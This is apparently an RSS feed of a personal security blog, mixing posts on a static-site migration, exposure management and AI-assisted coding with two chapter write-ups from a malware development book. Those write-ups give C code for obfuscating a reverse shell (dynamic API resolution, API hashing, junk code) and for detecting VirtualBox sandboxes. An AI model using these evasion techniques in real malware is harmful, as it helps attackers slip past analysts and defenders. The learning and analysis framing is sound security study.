https://blog.ericturner.it/2026-05-17T20:36:00-04:002026-05-17T20:36:00-04:002026-05-17T20:36:00-04:00Eric Turnertag:blog.ericturner.it,2026-05-17:/2026/05/17/new-blog-2026/

<p>This marks the debut of my redesigned blog. My prior blog was ran on Wordpress with multiple plugins for enhancing security: filtering spam, blocking malicious admin logins, filtering malicious comments, backup jobs, auto-update jobs, analytics, asynchronous password protection. Unfortunately with AI, search crawlers and legitimate users, it kept hitting the …</p>

<p>This marks the debut of my redesigned blog. My prior blog was ran on Wordpress with multiple plugins for enhancing security: filtering spam, blocking malicious admin logins, filtering malicious comments, backup jobs, auto-update jobs, analytics, asynchronous password protection. Unfortunately with AI, search crawlers and legitimate users, it kept hitting the resource cap constantly and DoSing my site. I have years of emails from Wordpress that my blog was falling offline and it's due to too many concurrent sessions and php processes consuming resources.</p> <p>Using Claude to help with the UI and migration, I have pulled all my images and blog posts from Wordpress, compressed and reformatted them, and converted into a static site. My hope is to now have 100% uptime and tightened security. The beauty of static sites means no external comments to moderate, no login panels or plugin updates, it's just pure HTML. It should also be lightning fast compared to the Wordpress site, as it needs to load significantly less external resources and has no database communications needed to present content.</p> <p>I also was careful to ensure the URL scheme exactly matched Wordpress' format, so all the external links referencing certain blog posts will resolve as if there was only a fresh coat of paint applied and not a complete overhaul of the entire infrastructure.</p> <p>There's currently no search functionality, but the Archives link in the sidebar will help list all articles chronilogically. I will investigate bringing some sort of search functionality back that will work with static sites.</p>2025-06-22T21:01:00-04:002025-06-22T21:01:00-04:00Eric Turnertag:blog.ericturner.it,2025-06-22:/2025/06/22/continuous-threat-exposure-management/

<p>I recently <a href="https://www.credly.com/badges/1bccd16f-90cb-4010-847f-d91111b7548e/public_url">earned a certificate</a> in exposure management and here&rsquo;s some of the key takeaways. Cyber teams now have a broad attack surface with assets ranging from on-prem to IoT and cloud solutions. Traditional vulnerability management simply can&rsquo;t keep up. That&rsquo;s where exposure management steps in: it …</p>

<p>I recently <a href="https://www.credly.com/badges/1bccd16f-90cb-4010-847f-d91111b7548e/public_url">earned a certificate</a> in exposure management and here&rsquo;s some of the key takeaways. Cyber teams now have a broad attack surface with assets ranging from on-prem to IoT and cloud solutions. Traditional vulnerability management simply can&rsquo;t keep up. That&rsquo;s where exposure management steps in: it combines threat context, asset criticality, and automated validation to focus your efforts on what really matters.</p> <h2 id="what-is-exposure-management-introducing-ctem">What Is Exposure Management? Introducing CTEM</h2> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/06/img_5912-1.webp"/></p> <p>Gartner coined Continuous Threat Exposure Management (CTEM) to describe a cyclical, risk-driven process involving five stages:</p> <p><strong>Scoping</strong> &ndash; Identify the attack surface and high-value assets</p> <p><strong>Discovery</strong> &ndash; Detect vulnerabilities, misconfigurations, identity gaps</p> <p><strong>Prioritization</strong> &ndash; Score exposures based on CVSS/EPSS, asset importance, and threat intel</p> <p><strong>Validation</strong> &ndash; Use BAS, pentesting, or attack simulations to confirm exploitability</p> <p><strong>Mobilization</strong> &ndash; Automate remediation workflows and measure outcomes&nbsp;</p> <p>By 2026, Gartner predicts organizations embracing CTEM will be three times less likely to suffer a breach (<a href="https://www.gartner.com/en/articles/how-to-manage-cybersecurity-threats-not-episodes">source</a>).</p> <h2 id="building-an-exposure-management-program">Building an Exposure Management Program</h2> <p>Let&rsquo;s break down the five stages above into actionable steps:</p> <p>1. Scoping &amp; Asset Categorization</p> <p>Group assets by business importance: External, Critical Infra, Legacy Define pilot domains (e.g., customer-facing servers)</p> <p>2. Discovery &amp; Filtering</p> <p>Scan using a vulnerability scanner (Rapid7 / Tenable) or endpoint solution (Ivanti / Crowdstrike) to automatically find assets connected to the network</p> <p>3. Risk Scoring</p> <p>Merge CVSS/EPSS, threat intel (KEV), exploit availability, and asset criticality to create an overall exposure score</p> <p>4. Validation</p> <p>Trigger purple team / attack simulations against prioritized flaws to confirm attack paths, success of remediation and resiliency</p> <p>5. Mobilization &amp; Reporting</p> <p>Auto-generate tickets with context and score Track KPIs: Mean Exposure Score, Time-to-remediate, patch coverage Governance: Align with NIST CSF / SP 800‑53 control objectives</p> <p>Potential Accompanying Tools</p> <ul> <li>External Attack Surface Management (EASM)</li> <li>Exposure Assessment Platforms (EAP) &ndash; Contextual scanning, threat intel integration&nbsp;</li> <li>Adversarial Exposure Validation (AEV) &ndash; BAS + automated red teaming&nbsp;</li> </ul> <h2 id="evidence-backed-enhancements">Evidence-Backed Enhancements</h2> <p>A recent academic model, Vulnerability Management Chaining, combines KEV, EPSS, and CVSS to reduce remediations by 95% while maintaining 85% threat coverage&nbsp;.(<a href="https://arxiv.org/abs/2506.01220">source</a>)</p> <h2 id="summary">Summary</h2> <p>It&rsquo;s more important than ever to evolve existing vulnerability management programs into exposure management. The continual cycle of assessing risk based on business needs and criticality, alongside validation of risk using attack simulations, greatly improves the over security of the organization and puts you on a better path to prevent a breach.</p>2025-03-29T21:45:22-04:002025-03-29T21:45:22-04:00Eric Turnertag:blog.ericturner.it,2025-03-29:/2025/03/29/web-dev-rss-reader-app-02/

<p>GitHub:&nbsp;<a href="https://github.com/EricTurner3/simple-react-rss-reader">EricTurner3/simple-react-rss-reader</a> </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-13.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-10.webp"/></p> <p>Drag and drop UI</p> <p>I recently stumbled upon <a href="https://www.cursor.com/">Cursor - The AI Code Editor</a>. It essentially is VS Code powered by Claude for GPT enhancements. The unique thing about this AI is taht it has your entire multi-file codebase as context and can easily search and modify the …</p>

<p>GitHub:&nbsp;<a href="https://github.com/EricTurner3/simple-react-rss-reader">EricTurner3/simple-react-rss-reader</a> </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-13.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-10.webp"/></p> <p>Drag and drop UI</p> <p>I recently stumbled upon <a href="https://www.cursor.com/">Cursor - The AI Code Editor</a>. It essentially is VS Code powered by Claude for GPT enhancements. The unique thing about this AI is taht it has your entire multi-file codebase as context and can easily search and modify the code when a request is entered:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-11.webp"/></p> <p>The issues I was having with Gemini or GPT-4o had to do with the fact it only had context from a single file. When changes needed to be made to another file, it seemed to lose context and then would start hallucinating variable names.<br/> Here's another example where it used <code>grep</code> on my codebase for a specific function name, and then made changes in multiple files to support the new code: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-12.webp"/></p> <p>Another powerful feature was lint validation. After making changes, it would do another pass to see if any lint was throwing validation warnings or errors and keep looping through as many files as it needed to in order to fix the issues. Thanks to Cursor, it seamlessly generated the backend files with a MongoDB connector. I also had it start over on the front end, hook up the front end to the backend (which it did via the api file) and implement drag and drop, which Gemini and GPT-4o both had issues with. </p> <p>Cursor is a very cool application that can easily turn an idea into a fully functional web application without the user needing to edit much code at all. I still find it is very helpful to know how to read errors and read through some of the code yourself. I ended up getting stuck in an edit loop where Cursor was changing back and forth between using MongoDB's <code>_id</code> as a primary key and <code>id</code> as a primary and it would cause the APIs to 404. I had to specifically tell the AI to use <code>_id</code> for certain fields. I also had to specifically guide it to certain functions I found in source documents to help it implement, otherwise it had tried using deprecated functions or functionality that didn't work as intended. </p> <p>Another super cool thing that only took about another two hours was converting the application into a containerized version. Now with a simple <code>docker-compose up --build</code> the application is ready to go out of the box to setup all dependencies and networking among the database, backend and frontend.</p>2025-03-20T20:43:32-04:002025-03-20T20:43:32-04:00Eric Turnertag:blog.ericturner.it,2025-03-20:/2025/03/20/web-dev-rss-reader-app-01/

<p>GitHub: <a href="https://github.com/EricTurner3/simple-react-rss-reader">EricTurner3/simple-react-rss-reader</a></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/front_end_20Mar2025.webp"/></p> <p>I have a few goals with this project that I've already spent several hours on over the past few nights.</p> <h2 id="1-testing-out-ai-based-tools-for-code-generation-and-guidance">1. Testing out AI based tools for code generation and guidance</h2> <p>Gemini released the new <a href="https://gemini.google/overview/canvas/">Canvas</a> tool a few days ago which immediately blew my mind. You …</p>

<p>GitHub: <a href="https://github.com/EricTurner3/simple-react-rss-reader">EricTurner3/simple-react-rss-reader</a></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/front_end_20Mar2025.webp"/></p> <p>I have a few goals with this project that I've already spent several hours on over the past few nights.</p> <h2 id="1-testing-out-ai-based-tools-for-code-generation-and-guidance">1. Testing out AI based tools for code generation and guidance</h2> <p>Gemini released the new <a href="https://gemini.google/overview/canvas/">Canvas</a> tool a few days ago which immediately blew my mind. You can give it a prompt and it can not only generate the code but it can also show an interactable preview using mock data. It was very fascinating to me in how this was possible from the one page of code it displays. As I quickly found out if you set up a local project and copy paste the code, the code is either riddled with errors and/or it's missing a bunch of other things such as dependencies and other project files. I'm not quite sure how they are pulling off the front-end preview using just the code snippet provided, it took me several iterations and prompts to get a good template for just the App.tsx in my app. I spent several hours figuring out the best frontend framework and dependencies to get the app working. Some of the code it generates is calling libraries and components that aren't always documented, and I had to do a bit of research to figure out if they were real or imagined. Other times, the code is out of order. It calls a variable that is only set later on. Simply reordering the code in a function fixed some of the errors. Overall, there were just a bunch of little things that required me to prompt for more help to figure out what it was trying to do so I could fix it. I also relied on OpenAI's GPT-4o mini and VS Code's CoPilot to help assist to see if either of those models could help fix some of the errors.</p> <p>Once the main application was built, I found that you can't ask Gemini to make small changes and keep going. The next iteration could completely change variable names or churn out a completely different application with similar parameters, as seen below. I wanted the number of unread items from an RSS feed to show as badges in the sidebar. I was under the impression it used prior context to continue the conversation, but it was not the case, and I instead got a chat message application. </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-8.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-6.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-7.webp"/></p> <p>I found when I wanted to explain and work on specific pieces of code, GPT-4o mini was much better at determining context and doing follow-up actions. But Gemini did a great job in getting most of the boilerplate, even though I had to go back through and fix a number of errors</p> <h2 id="2-learning-about-the-mern-mean-stack">2. Learning about the MERN / MEAN stack</h2> <p>During my time as a full-stack developer, I had built a custom PHP back-end framework that handled routing, database connections and so forth. I never had a true front-end framework such as React or Vue, and instead created my own templating engine using Bootstrap templates and injecting PHP into them. If I needed to reuse a card, I would have a <code>card.php</code> component that could be imported and called multiple times. It was very similar to React, but completely of my own design (and lacking in as nuanced of features and optimizations.</p> <p>This stack is completely based in JavaScript for both front-end, React, and back-end, NodeJS / Express. When Gemini first created some of the code for the front end, I was immediately aware of my lack of knowledge in this framework. Items such as interfaces, presences and contexts that I was unaware how they functioned or related to each other. It's been a journey fixing the errors from AI generated code and having a multitude of tabs open to reference some of the dependencies to determine how things should be built. At one point I was trying to do a drag and drop system over multiple contexts and quickly realized that was far out of my scope and to instead just use arrows to move an item up or down an index or to another list was fine for me.</p> <p>So far, I have a working alpha prototype (seen at the top of this page) that allows the end user to add RSS feeds, assign them to folders and mark items as read. There are still some bugs, and all data is currently only stored in local storage. Occasionally the feed list seems to wipe itself, it might be something to do with states or contexts that I'm not fully knowledgeable about yet.</p> <h2 id="3-containerization">3. Containerization</h2> <p>As I mentioned above, all data is stored in the local storage in the browser, which is not something I want to do. I'd like data to be stored in a database, so it persists if the browser is closed down or wiped. I don't currently have plans for any sort of multi-user authentication system or anything, as this project is purely meant to load from publicly available RSS Feeds. I also don't think it's helpful to have a full-stack project and then require an end user to have to run a bunch of commands to properly configure the backend and database. I have not built docker containers myself before, but I have used them from other open-source projects. My end goal is to have a full web app that can be ran from a simple docker compose command and immediately allow the user to add and save data into a MongoDB database as easy as possible. After that, we can look into any future enhancements.</p>2025-03-15T19:12:23-04:002025-03-15T19:12:23-04:00Eric Turnertag:blog.ericturner.it,2025-03-15:/2025/03/15/malware-dev-chapter-06-anti-disassembly-strategies/

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <h1 id="opcode-assembly-obfuscation">Opcode / Assembly Obfuscation</h1> <p>The main point of opcode obfuscation is to make it harder for the analyst to decompile the code. Other sources seem to refer to this as directly making changes to the assembly or …</p>

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <h1 id="opcode-assembly-obfuscation">Opcode / Assembly Obfuscation</h1> <p>The main point of opcode obfuscation is to make it harder for the analyst to decompile the code. Other sources seem to refer to this as directly making changes to the assembly or binary in order to obfuscate. The book instead just adds junk code - code that runs a bunch of mathematical calculations but serves no other purpose - just to obfuscate. While I definitely see junk code as a method of obfuscation for a decompiler, I'm not sure it meets the actual definition of assembly obfuscation. </p> <p>Nonetheless, using the reverse shell from Ch 1, a new function is added and called within main() to run a bunch of random math calculations. The author runs this code at the end of the program, after the reverse shell process has been created. I don't like this approach. Instead, I call this function first, and then also randomly again a few times during the reverse shell setup. Thus, if someone is line by line debugging with x64dbg, they have to go through a bunch of junk before seeing what really occurs. This should hopefully create a bunch of JMP instructions to keep breaking the debugger into doing math.</p> <p>Reverse shell works fine. Throwing this into ghidra, not much really seems to be obfuscated by just adding extra function calls like this. It would be more useful to mask some of the strings or calls used to set up the reverse listener than the extra junk code. </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image.webp"/></p> <p>I renamed the functions for main and junk. The true intent is still rather obvious, however it did take a bit to find this function as ghidra's entry point was not the actual main function.</p> <h1 id="function-call-obfuscation">Function Call Obfuscation</h1> <p>Because I never read the full chapter first and work step by step, this next section appears to fix some of the issues of the first obfuscation. Instead of directly calling functions from the ws2_32 library, we use function pointer types and GetProcAddress to dynamically load the proper functions.</p> <p>At the top, use the windows app documentation to rebuild the function calls we want to use.</p> <ul> <li><a href="https://learn.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup">WSAStartup function (winsock.h) - Win32 apps | Microsoft Learn</a></li> <li><a href="https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasocketa">WSASocketA function (winsock2.h) - Win32 apps | Microsoft Learn</a></li> <li><a href="https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaconnect">WSAConnect function (winsock2.h) - Win32 apps | Microsoft Learn</a></li> </ul> <div class="highlight"><pre><span></span><code><span class="k">typedef</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="p">(</span><span class="n">WSAAPI</span><span class="w"> </span><span class="o">*</span><span class="n">WSAStartup_t</span><span class="p">)(</span><span class="n">WORD</span><span class="p">,</span><span class="w"> </span><span class="n">LPWSADATA</span><span class="p">);</span> <span class="k">typedef</span><span class="w"> </span><span class="n">SOCKET</span><span class="w"> </span><span class="p">(</span><span class="n">WSAAPI</span><span class="w"> </span><span class="o">*</span><span class="n">WSASocket_t</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="n">LPWSAPROTOCOL_INFO</span><span class="p">,</span><span class="w"> </span><span class="n">GROUP</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="p">);</span> <span class="k">typedef</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="p">(</span><span class="n">WSAAPI</span><span class="w"> </span><span class="o">*</span><span class="n">WSAConnect_t</span><span class="p">)(</span><span class="n">SOCKET</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr</span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="n">LPWSABUF</span><span class="p">,</span><span class="w"> </span><span class="n">LPWSABUF</span><span class="p">,</span><span class="w"> </span><span class="n">LPQOS</span><span class="p">,</span><span class="w"> </span><span class="n">LPQOS</span><span class="p">);</span> </code></pre></div> <p>Then in the main function, we use our definitions along with <code>GetProcAddress</code> to dynamically resolve the real function calls:</p> <div class="highlight"><pre><span></span><code><span class="n">HMODULE</span><span class="w"> </span><span class="n">hWS2_32</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">LoadLibrary</span><span class="p">(</span><span class="s">"ws2_32.dll"</span><span class="p">);</span> <span class="n">WSAStartup_t</span><span class="w"> </span><span class="n">st</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">WSAStartup_t</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hWS2_32</span><span class="p">,</span><span class="w"> </span><span class="s">"WSAStartup"</span><span class="p">);</span> <span class="n">WSASocket_t</span><span class="w"> </span><span class="n">so</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">WSASocket_t</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hWS2_32</span><span class="p">,</span><span class="w"> </span><span class="s">"WSASocketA"</span><span class="p">);</span> <span class="n">WSAConnect_t</span><span class="w"> </span><span class="n">co</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">WSAConnect_t</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hWS2_32</span><span class="p">,</span><span class="w"> </span><span class="s">"WSAConnect"</span><span class="p">);</span> </code></pre></div> <p>One other trick I performed was removing the hardcoded <code>4444</code> port but instead used a function to do a bunch of garbage math to return the port for later use:</p> <div class="highlight"><pre><span></span><code><span class="kt">int</span><span class="w"> </span><span class="nf">wow</span><span class="p">(){</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">8888</span><span class="p">;</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">number2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">6666</span><span class="p">;</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">number3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">9999</span><span class="p">;</span> <span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">2</span><span class="p">;</span> <span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">4</span><span class="p">;</span> <span class="w"> </span><span class="n">number3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">number3</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span> <span class="w"> </span><span class="n">number2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">number3</span><span class="p">;</span> <span class="w"> </span><span class="n">number3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">number2</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">number</span><span class="p">;</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">number</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>Compiled and ran on the target machine, reverse shell pops fine.</p> <p>Using Ghidra, we can see it is a bit more involved to reverse. The port is passed to htons, but it has to go into another function to determine what value this is. Using similar tactics of nesting all important strings in functions could help here:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-1.webp"/></p> <h1 id="function-hashing">Function Hashing</h1> <p>This chapter doesn't dive into the algorithm, but provides a PowerShell script that allows you to pass in the Win32 function name, such as CreateProcess, and it then returns a hash ID. This is further expanded upon in C code, with another function <code>getAPIAddr</code> to confirm if the hash matches the function address being searched. This function is not explained at this time.</p> <p>However, it is used to replace the CreateProcess function call using a hashed value. I took this a step further and calculated hashes to the other WSAStartup, Socket, Connect functions and used the hashing here as well. The source code provided by the author tries to directly call <code>(char *)"kernel32"</code>which does not work for me. I needed to use LoadLibrary and also ensure <code>#include &lt;windows.h&gt;</code> was at the top.</p> <p>As a side note, I have also seen this before during my <a href="https://blog.ericturner.local/2025/01/08/hackthebox-sherlock-lovely-malware/">Lovely Malware</a> reverse engineering.</p> <p>After using API hashing for several of the main functions, our reverse shell connects fine like usual.</p> <p>Opening up Ghidra, things are definitely looking much more complicated. While it is apparent which libraries are being called, the functions themselves are not apparent: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-2.webp"/></p> <p>If we continued to do this for other functions such as <code>htons</code> and <code>inet_addr</code>, and started to obfuscate or encrypt strings, it would really be a perfect example of full obfuscation.</p> <h1 id="crashing-malware-analysis-tools">Crashing Malware Analysis Tools</h1> <p>This section uses a recursive function with the intent to break decompilers by running out of memory. </p> <p>Running this in x32dbg shows the stack overflow, but does not crash the debugger itself:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/03/image-3.webp"/></p> <p>However in this instance, I wasn't able to get a reverse shell either. The exe crashes. Lowering the number down even to 250000 from 1000000 has no effect and still causes a crash.</p> <h1 id="conclusion">Conclusion</h1> <p>This chapter was interesting. The section I liked the best was the API hashing technique that can be used to mask API calls from a decompiler and require more advanced analysis to reverse. I have seen malware use this approach before where every single call is an API hash. The best reversal technique for that was to have Ghidra on one side and x64dbg on the other and wait to see what library eventually gets loaded once the relevant code appears. Then, the function can be properly renamed to give a better sense of what is going on. It definitely creates a lot more work for the malware analyst to decipher though.</p>2025-02-15T19:51:53-05:002025-02-15T19:51:53-05:00Eric Turnertag:blog.ericturner.it,2025-02-15:/2025/02/15/malware-dev-chapter-06-anti-vm-strategies/

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <h1 id="filesystem-detection-techniques">Filesystem Detection Techniques</h1> <h2 id="virtualbox-machine-detection">VirtualBox Machine Detection</h2> <p>The book showcases 8 different files to test for a VirtualBox, however, the sample code only checks for 2/8 files. I created a modified source code that uses an …</p>

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <h1 id="filesystem-detection-techniques">Filesystem Detection Techniques</h1> <h2 id="virtualbox-machine-detection">VirtualBox Machine Detection</h2> <p>The book showcases 8 different files to test for a VirtualBox, however, the sample code only checks for 2/8 files. I created a modified source code that uses an array to check for all of these and print out if one is detected.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Anti-VM - VirtualBox File Detect</span> <span class="cm"> 15 Feb 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-g++ -O2 06_vbox_file_detect.c -o VBoxFile.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="n">BOOL</span><span class="w"> </span><span class="nf">checkVM</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Paths to check</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">paths</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">VBoxMouse.sys"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">VBoxGuest.sys"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">VBoxSF.sys"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">drivers</span><span class="se">\\</span><span class="s">VBoxVideo.sys"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">vboxdisp.dll"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">vboxhook.dll"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">vboxservice.exe"</span><span class="p">,</span> <span class="w"> </span><span class="s">"c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">vboxtray.exe"</span> <span class="w"> </span><span class="p">};</span> <span class="w"> </span><span class="c1">// placeholder, default to FALSE</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">vm_detected</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// loop through the filepaths to see if any exist</span> <span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">paths</span><span class="p">)</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">paths</span><span class="p">[</span><span class="mi">0</span><span class="p">]));</span><span class="w"> </span><span class="o">++</span><span class="n">i</span><span class="p">){</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">attributes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetFileAttributes</span><span class="p">(</span><span class="n">paths</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">attributes</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">INVALID_FILE_ATTRIBUTES</span><span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span><span class="o">!</span><span class="p">(</span><span class="n">attributes</span><span class="w"> </span><span class="o">&amp;</span><span class="w"> </span><span class="n">FILE_ATTRIBUTE_DIRECTORY</span><span class="p">)){</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"VirtualBox File Found: %s </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">paths</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> <span class="w"> </span><span class="n">vm_detected</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">vm_detected</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">checkVM</span><span class="p">())</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"The system appears to be a virtual machine.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"The system does not appear to be a virtual machine.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h1 id="hardware-detection_1">Hardware Detection</h1> <p>The book uses some sample code to check the HDD Vendor ID to detect for Virtual Machine. I think this approach is not useful, as my VM did not have a \\PhysicalDrive0, it has a HarddiskVolume1 similar to my non-VM Windows machine. The sample code ended up failing on my VM and stated it was not a virtual machine.</p> <h1 id="time-detection">Time Detection</h1> <p>The book uses NTDelayExecution and capturing the before / after time to determine if it slept the appropriate amount of milliseconds. The example uses 800ms &gt; time &lt; 1000ms to detect. On my actual machine, it nailed 1000ms 